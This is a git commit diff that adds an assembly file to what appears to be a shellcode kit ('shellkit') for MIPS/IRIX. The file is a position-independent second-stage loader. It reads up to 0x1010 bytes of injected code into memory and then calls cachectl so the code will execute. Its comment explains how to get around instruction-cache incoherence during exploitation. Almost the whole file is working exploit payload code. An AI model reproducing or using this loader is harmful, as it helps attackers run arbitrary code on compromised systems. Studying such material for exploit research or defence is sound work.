initial

1 files changed, 51 insertions, 0 deletions

diff --git a/other/shellkit/mips_irix/read.s b/other/shellkit/mips_irix/read.s
new file mode 100644
index 0000000..90ab25d
--- /dev/null
+++ b/other/shellkit/mips_irix/read.s
@@ -0,0 +1,51 @@
+/* MIPS/IRIX PIC read/cacheflush code
+ *
+ * -sc.
+ *
+ * some note:
+ * since the data that is read in is treated in the data cache, you may
+ * experience a data/instruction cache incoherence, where the instruction
+ * cache still contains the old memory contents. to avoid this, send a lot
+ * of data, first the shellcode and then a huge bogus space of nops, which
+ * are to flush the data cache, later making the instruction cache populated
+ * with the real shellcode. or do it as we do it here, use a cacheflush
+ * syscall. this is only possible if this code is already in icache, so for
+ * the usual exploitation situation that does not help much.
+ */
+
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+
+        .section .text
+
+        .globl  cbegin
+        .globl  cend
+
+cbegin:
+        .set    noreorder
+        .set    nomacro
+
+foo:    bltzal  zero, foo
+        slti    a0, zero, -1
+
+        addu    ra, ra, (0x0101 + 48)
+        subu    a1, ra, 0x0101
+
+        li      a2, 0x1010      /* read 0x1010 bytes max */
+        li      v0, SYS_read
+        syscall
+
+        subu    a0, ra, 0x0101  /* data was read to here */
+        li      a1, 0x1010      /* should be cacheline aligned */
+        li      t2, -4
+        not     a2, t2          /* BCACHE = 0x03 */
+        li      v0, SYS_cachectl        /* 0x047e */
+        syscall
+        li      t8, 0x7350      /* has to be a sane bds */
+
+        .end    cbegin
+cend:
+